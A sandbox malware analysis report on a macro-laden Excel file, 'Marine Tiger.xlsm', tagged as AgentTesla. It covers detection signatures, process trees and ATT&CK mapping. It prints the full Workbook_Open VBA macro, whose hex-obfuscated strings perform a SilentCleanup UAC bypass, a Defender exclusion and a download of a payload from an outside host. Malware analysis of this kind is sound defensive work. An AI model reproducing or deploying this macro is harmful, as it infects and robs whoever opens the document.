Loading ...

Play interactive tourEdit tour

Analysis Report Marine Tiger.xlsm

Overview

General Information

Sample Name:Marine Tiger.xlsm
Analysis ID:349782
MD5:18d6c58d438aa199c43cec6503ae2a6c
SHA1:f2dbad3686195f07db9bac1aa7eba45120069ded
SHA256:6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d
Tags:AgentTeslaexexlsm

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2284 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2464 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • schtasks.exe (PID: 2496 cmdline: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I, CommandLine: 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2284, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I, ProcessId: 2464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Marine Tiger.xlsmVirustotal: Detection: 40%Perma Link
Source: Marine Tiger.xlsmReversingLabs: Detection: 29%
Machine Learning detection for sampleShow sources
Source: Marine Tiger.xlsmJoe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IWshShell3.Run("cmd /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I")Name: Workbook_Open
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Marine Tiger.xlsmOLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: Marine Tiger.xlsmOLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: Marine Tiger.xlsmOLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell")Name: Workbook_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell")Name: Workbook_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell")Name: Workbook_Open
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: Marine Tiger.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regdelete, regwrite, run
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: Marine Tiger.xlsmStream path 'VBA/ThisWorkbook' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E
Source: Marine Tiger.xlsmOLE, VBA macro line: Public Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
Source: Marine Tiger.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal80.expl.winXLSM@5/1@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Marine Tiger.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE08.tmpJump to behavior
Source: C:\Windows\System32\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ......................................v....)..v................................5...................Jump to behavior
Source: C:\Windows\System32\schtasks.exeConsole Write: .................................................1.v......................;.............................................X.................;.....Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Marine Tiger.xlsmVirustotal: Detection: 40%
Source: Marine Tiger.xlsmReversingLabs: Detection: 29%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection11Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Process Injection11LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting42Logon Script (Windows)Logon Script (Windows)Scripting42Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Marine Tiger.xlsm40%VirustotalBrowse
Marine Tiger.xlsm29%ReversingLabsScript-Macro.Trojan.Valyria
Marine Tiger.xlsm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:349782
Start date:08.02.2021
Start time:08:12:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 57s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Marine Tiger.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.expl.winXLSM@5/1@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

TimeTypeDescription
08:12:39API Interceptor1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\~$Marine Tiger.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):165
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fV:vBFFGS
MD5:797869BB881CFBCDAC2064F92B26E46F
SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:true
Reputation:high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.2916363654589444
TrID:
  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
  • ZIP compressed archive (8000/1) 7.58%
File name:Marine Tiger.xlsm
File size:13677
MD5:18d6c58d438aa199c43cec6503ae2a6c
SHA1:f2dbad3686195f07db9bac1aa7eba45120069ded
SHA256:6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d
SHA512:2a0c139a909810abbeea86258c7fa4960b6eb2893e8203a0f5815a080070062957a7aa7ccfc27bd3ef5129c31c03c28139b9e05d2284d52b9f89ec15752c1621
SSDEEP:192:HePPN4twKo8V99pSKCxW9KBIYU0mT2+QOUSp+Qak1Y5t0SQxizT3W7+p+1iTvVp+:HeHNSVV9GKCZBILhTBY4D9SQITMaT2
File Content Preview:PK..........!...5Qo...?.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/349782/sample/Marine Tiger.xlsm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:admin
Last Saved By:admin
Create Time:2021-02-08T00:29:32Z
Last Saved Time:2021-02-08T00:29:32Z
Creating Application:Microsoft Excel
Security:0

Document Summary

Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:15.0300

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 991
General
Stream Path:VBA/Sheet1
VBA File Name:Sheet1.cls
Stream Size:991
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . H . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 48 ab 9b d5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: ThisWorkbook.cls, Stream Size: 3911
General
Stream Path:VBA/ThisWorkbook
VBA File Name:ThisWorkbook.cls
Stream Size:3911
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . [ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . % y . B . I . " . . L . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . V . . . . D . + 1 . 2 + 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . V . . . . D . + 1 . 2 + 4 . . . . . % y . B . I . " . . L . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 03 00 01 00 00 82 04 00 00 e4 00 00 00 10 02 00 00 b0 04 00 00 be 04 00 00 ee 0a 00 00 00 00 00 00 01 00 00 00 48 ab 8a 5b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 fd eb 8f e2 25 79 1a 42 a4 49 8c 22 2e 88 4c dc 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Mid(str,
VB_Name
VB_Creatable
"ThisWorkbook"
VB_Exposed
ghhfgfgdsfas
ghhfgfgdsfas.Run
Public
ghhfgfgdsfas.RegWrite
Function
hgfhffsadsa(b)
Chr(CLng("&H"
Len(str)
hgfhffsadsa(a),
hgfhffsadsa(d)
VB_Customizable
ghhfgfgdsfas.RegDelete
CreateObject("WScript.Shell")
hgfhffsadsa(str)
hgfhffsadsa
Application.Wait
ActiveWorkbook.Close
VB_TemplateDerived
False
Attribute
(hgfhffsadsa(c))
Workbook_Open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VBA Code
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
 Set ghhfgfgdsfas = CreateObject("WScript.Shell")
  Set ghhfgfgdsfas = CreateObject("WScript.Shell")
  a = "545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"
  b = "6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33"
  c = "6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55"
  d = "545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E"
   ghhfgfgdsfas.RegWrite hgfhffsadsa(a), hgfhffsadsa(b)
   ghhfgfgdsfas.Run (hgfhffsadsa(c))
   Set ghhfgfgdsfas = CreateObject("WScript.Shell")
  Application.Wait (Now + TimeValue("0:00:07"))
   ghhfgfgdsfas.RegDelete hgfhffsadsa(d)
   ActiveWorkbook.Close
   End Sub
    Function hgfhffsadsa(str)
        Dim i
        Dim sStr
        sStr = ""
        For i = 1 To Len(str) Step 2
            sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2)) - 12)
        Next
        hgfhffsadsa = sStr
    End Function

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:410
Entropy:5.28659801209
Base64 Encoded:True
Data ASCII:I D = " { 3 5 7 D B 1 7 0 - 5 7 2 A - 4 4 4 C - 9 6 A B - F 4 7 A 4 B E A 9 A 3 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 0 2 2 C 7 0 D C B 0 D C B 0 D C B 0 D C B " . . D P B = " 4 0 4 2 A 7 2 8 A 8 2 8 A 8 2 8 " . . G C = " 6 0 6 2 8 7 4 8 8 8 4 8 8 8 B 7 " . . .
Data Raw:49 44 3d 22 7b 33 35 37 44 42 31 37 30 2d 35 37 32 41 2d 34 34 34 43 2d 39 36 41 42 2d 46 34 37 41 34 42 45 41 39 41 33 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
Stream Path: PROJECTwm, File Type: data, Stream Size: 62
General
Stream Path:PROJECTwm
File Type:data
Stream Size:62
Entropy:3.05546715432
Base64 Encoded:False
Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2626
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:2626
Entropy:4.20376881285
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1619
General
Stream Path:VBA/__SRP_0
File Type:data
Stream Size:1619
Entropy:3.43446059295
Base64 Encoded:False
Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . H . E . . . . g g . x . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 201
General
Stream Path:VBA/__SRP_1
File Type:data
Stream Size:201
Entropy:1.7880291092
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s t r ^ . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 788
General
Stream Path:VBA/__SRP_2
File Type:data
Stream Size:788
Entropy:1.87355751034
Base64 Encoded:False
Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . / . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
